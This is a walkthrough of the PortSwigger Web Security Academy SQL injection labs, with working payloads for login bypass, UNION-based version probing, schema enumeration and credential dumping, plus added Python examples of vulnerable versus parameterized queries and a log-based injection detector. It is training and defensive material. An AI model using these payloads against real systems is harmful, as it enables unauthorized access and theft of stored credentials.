Burp Web Academy SQL Injection
0x01. PortSwigger Web Security Academy
PortSwigger Web Security Academy is the free web security training ground published by the makers of Burp Suite; while learning web security concepts you also get to practise hands-on Burp Suite skills.
This article walks through the SQL Injection section of the Web Security Academy.
0x02. SQL Injection
2.1 Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:
```
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
```
To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.
The most basic SQL injection vulnerability. The one complaint is that the task wording is ambiguous: it is not the case that displaying just one unreleased product counts as passing.
Official payload: `/filter?category='+OR+1=1--`
2.2 Lab: SQL injection vulnerability allowing login bypass
This lab contains a SQL injection vulnerability in the login function.
To solve the lab, perform a SQL injection attack that logs in to the application as the `administrator` user.
The payload used to solve it:
```
csrf=acKaTEUeqj1x7oeKKAytd9wyzlKXjP3I&username=administrator'+and+1%3d1--&password=123
```
Note that the `=` in `1=1` must be encoded as `%3d`; otherwise the POST body parameters are parsed incorrectly.
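The two query shapes behind labs 2.1 and 2.2, each written once with string concatenation and once with a bound parameter, as an added example (not code from the original post or from PortSwigger). It uses an in-memory SQLite database; the table and column names follow the lab descriptions, the rows and the `administrator` password are constructed, and the inputs are the decoded forms of the two payloads above.

```python
"""Added example (not from the original post or from PortSwigger): the
category filter (lab 2.1) and the login check (lab 2.2) built both ways,
by pasting input into the SQL text and with bound parameters. Data is
constructed; the SQLite dialect is used because it runs anywhere."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two 'Gifts' products (one unreleased),
    one 'Pets' product, and one user with a made-up password."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Gift card', 'Gifts', 1);
        INSERT INTO products VALUES ('Prototype mug', 'Gifts', 0);
        INSERT INTO products VALUES ('Dog lead', 'Pets', 1);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'constructed-password');
        """
    )
    return conn


# --- category filter (lab 2.1) -------------------------------------------

def filter_vulnerable(conn, category: str) -> list:
    """Builds the SQL by pasting the user's input into the statement, so
    whatever the user types becomes part of the query text."""
    sql = ("SELECT name FROM products WHERE category = '" + category
           + "' AND released = 1")
    return [row[0] for row in conn.execute(sql)]


def filter_safe(conn, category: str) -> list:
    """Same query with a bound parameter: the driver passes the category
    as a value, so quotes, OR and -- inside it are only characters."""
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(sql, (category,))]


# --- login check (lab 2.2) ------------------------------------------------

def login_vulnerable(conn, username: str, password: str) -> bool:
    sql = ("SELECT 1 FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo() -> dict:
    """Runs each pair with the decoded form of the post's payloads."""
    conn = make_db()
    injected_category = "' OR 1=1--"            # /filter?category='+OR+1=1--
    injected_user = "administrator' and 1=1--"  # lab 2.2 username field
    return {
        "filter_vulnerable": filter_vulnerable(conn, injected_category),
        "filter_safe": filter_safe(conn, injected_category),
        "login_vulnerable": login_vulnerable(conn, injected_user, "123"),
        "login_safe": login_safe(conn, injected_user, "123"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

With concatenation, the filter returns every product (the unreleased one and the other category included) and the login succeeds with a wrong password; with bound parameters the same inputs are just a category name and a username that do not exist, so the filter returns nothing and the login fails.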
2.3 Lab: SQL injection attack, querying the database type and version on Oracle
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
The payload used to solve it:
```
GET /filter?category=Accessories'+union+SELECT+banner,'test'+FROM+v$version-- HTTP/2
```
First, you need to know how to query the version information of an Oracle database; see SQL injection cheat sheet | Web Security Academy. Second, you need to understand what a `union` query does and how to use it (the column counts must match, otherwise the server returns an error).
The SQL UNION operator combines the result sets of two or more SELECT statements, so rows from several tables can be returned as a single result set. Each SELECT must return the same number of columns, and the corresponding columns must have compatible data types.
UNION removes duplicate rows by default; to keep every row, including duplicates, use UNION ALL.
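The three UNION rules this post relies on (matching column counts, UNION versus UNION ALL, and the `order by 2` positional sort used in lab 2.5), checked against an in-memory SQLite database as an added example that is not part of the original post. The tables and rows are constructed; the post's observation about `order by table_name` failing was made on MySQL and is not reproduced here.

```python
"""Added example (not part of the original post): UNION behaviour checked
in SQLite. Tables 'products' and 'notes' and their rows are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 'Gift card'), (2, 'Dog lead');
        CREATE TABLE notes (id INTEGER, text TEXT);
        INSERT INTO notes VALUES (9, 'Dog lead'), (10, 'Cat bed');
        """
    )
    return conn


def union_count_mismatch(conn) -> str:
    """Two columns on the left, one on the right: the database refuses the
    statement. Returns the error text ('' if it unexpectedly succeeds)."""
    try:
        conn.execute("SELECT id, name FROM products UNION SELECT text FROM notes")
        return ""
    except sqlite3.OperationalError as exc:
        return str(exc)


def union_vs_union_all(conn) -> tuple:
    """UNION drops the duplicate 'Dog lead'; UNION ALL keeps it.
    Returns (rows with UNION, rows with UNION ALL)."""
    dedup = conn.execute(
        "SELECT name FROM products UNION SELECT text FROM notes").fetchall()
    keep = conn.execute(
        "SELECT name FROM products UNION ALL SELECT text FROM notes").fetchall()
    return len(dedup), len(keep)


def order_by_index(conn) -> list:
    """The combined result is named after the first SELECT's columns, so a
    positional index is the portable way to sort it. Returns the second
    column of the combined rows in sorted order."""
    rows = conn.execute(
        "SELECT id, name FROM products UNION SELECT id, text FROM notes "
        "ORDER BY 2").fetchall()
    return [r[1] for r in rows]


if __name__ == "__main__":
    db = make_db()
    print("mismatch:", union_count_mismatch(db))
    print("union / union all:", union_vs_union_all(db))
    print("order by 2:", order_by_index(db))
```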
2.4 Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
The payload used to solve it:
```
GET /filter?category=Accessories'+union+select+null,%40%40version--+ HTTP/2
```
In MySQL the comment marker `--` must be followed by a space, i.e. `-- comment`, which is why the payload ends with a `+`; without it the server returns an error.
2.5 Lab: SQL injection attack, listing the database contents on non-Oracle databases
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the
administrator
user.
The first step is to work out the database type. Every database ships with its own built-in tables, and a `union` query against them leaks the relevant metadata.
Guessing MySQL first, run the following payload:
```
GET /filter?category=Accessories'+union+select+null,table_name+from+information_schema.tables
```
That did return plenty of table names, but unsorted; sort them with `order by 2` (note that in a `union` query the result's column names usually come from the first result set, so `order by table_name` would error):
```
GET /filter?category=Accessories'+union+select+null,table_name+from+information_schema.tables+order+by+2--+
```
One table, `users_hvpqiw`, looks like it holds user information; next, query its column names:
```
GET /filter?category=Accessories'+union+select+null,column_name+from+information_schema.columns+where+table_name%3d'users_hvpqiw'--+
```
Column names obtained:
```
username_sgtfxt
```
Then query the usernames and passwords:
```
GET /filter?category=Accessories'+union+select+username_sgtfxt,password_iomdmo+from+users_hvpqiw--+
```
Which returned:
```
<tr>
```
Log in with those credentials to complete the lab.
2.6 Lab: SQL injection attack, listing the database contents on Oracle
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the
administrator
user.
The Oracle variant of the `union` data-extraction attack.
```
GET /filter?category=Accessories'+union+select+null,table_name+from+all_tables+order+by+2--
```
Usernames and passwords obtained:
```
<tr>
```
2.7 Lab: SQL injection UNION attack, determining the number of columns returned by the query
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.
To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.
A `union` errors when the two result sets have different column counts, so just try one count at a time.
```
GET /filter?category=Accessories'+union+select+null,null,null--+
```
2.8 Lab: SQL injection UNION attack, finding a column containing text
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.
The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.
Once `union` is understood this is easy: supply the random string shown at the top of the page:
```
GET /filter?category=Pets'+union+select+null,'ZDr5hk',null--
```
2.9 Lab: SQL injection UNION attack, retrieving data from other tables
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.
The database contains a different table called `users`, with columns called `username` and `password`. To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the `administrator` user.
Couldn't be simpler:
```
GET /filter?category=Pets'+union+select+username,password+from+users--
```
2.10 Lab: SQL injection UNION attack, retrieving multiple values in a single column
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called `users`, with columns called `username` and `password`. To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the `administrator` user.
Testing shows the result has two columns: the first numeric, the second a string.
The shortcut is to query the `administrator` password directly:
```
GET /filter?category=Pets'+union+select+1,password+from+users+where+username%3d'administrator'--
```
To list all accounts and passwords:
```
GET /filter?category=Pets'+union+select+1,concat(username,'|',password)+from+users--
```
Result:
```
<th>administrator|dxy9iwjpicgz7b98t2kw</th>
```
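Every request in labs 2.3 to 2.10 travels in a GET query string, so the same patterns are visible to whoever reads the web server's access log. The detector below is an added example, not part of the original post: it URL-decodes the query string of each log line (turning `+` and `%3d` back into spaces and `=`) and flags the indicators that recur in this post. The log lines are constructed; the indicator names are my own.

```python
"""Added example (not part of the original post): URL-decode the query
string of access-log lines and flag the UNION-based shapes seen in this
post. Log lines are constructed in common log format."""
import re
from urllib.parse import unquote_plus

# Constructed sample log: lines 1-4 carry the shapes of the post's payloads,
# lines 5-6 are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /filter?category=Accessories'+union+select+null,%40%40version--+ HTTP/1.1" 200 1532
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /filter?category=Accessories'+union+select+null,table_name+from+information_schema.tables+order+by+2--+ HTTP/1.1" 200 9011
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /filter?category=Pets'+union+select+1,concat(username,'|',password)+from+users-- HTTP/1.1" 200 2210
10.0.0.6 - - [01/Jan/2024:10:00:11 +0000] "GET /filter?category='+OR+1=1-- HTTP/1.1" 200 7720
10.0.0.7 - - [01/Jan/2024:10:00:12 +0000] "GET /filter?category=Gifts HTTP/1.1" 200 4102
10.0.0.8 - - [01/Jan/2024:10:00:15 +0000] "GET /product?productId=3 HTTP/1.1" 200 3377
"""

# Each indicator is a regex applied to the decoded, lower-cased query string.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_catalog": re.compile(r"\binformation_schema\.|\ball_tables\b|\ball_tab_columns\b"),
    "version_probe": re.compile(r"@@version|\bv\$version\b"),
    "comment_terminator": re.compile(r"--\s*$|/\*"),
    "quote_tautology": re.compile(r"'\s*or\s+\d+\s*=\s*\d+"),
}

# Pulls method and request path out of the quoted request line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def decoded_query(request_path: str) -> str:
    """Returns the decoded query string of a request path ('' if none).
    unquote_plus maps '+' to a space and '%3d' to '=' in one step."""
    _, _, query = request_path.partition("?")
    return unquote_plus(query)


def scan_line(line: str) -> list:
    """Names of the indicators that match this line, in INDICATORS order."""
    m = LOG_RE.search(line)
    if not m:
        return []
    q = decoded_query(m.group("path")).lower()
    return [name for name, rx in INDICATORS.items() if rx.search(q)]


def scan_log(text: str) -> list:
    """(line number, matched indicator names) for every line with a hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings.append((lineno, hits))
    return findings


if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

Decoding before matching is the important part: the raw log line contains `+union+select+` and `%40%40version`, which a pattern written for `union select` or `@@version` would miss. The same indicators fit a WAF or SIEM rule, with the usual caveat that `--` and `or 1=1` also appear in legitimate free-text fields, so the catalog and version probes are the lower-noise signals.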
0x03. Summary
- SQL injection cheat sheet | Web Security Academy
- `union` usage
  - Best to leave a space after the comment marker `--`, i.e. write `-- ` rather than a bare `--`
- Data-extraction steps (`union`)
  - Determine the number of columns
  - Determine each column's data type
  - List all table names in the database
  - List all column names of the target table
  - Dump the data
- `order by` accepts a column index as well as a column name
- String handling function: `concat`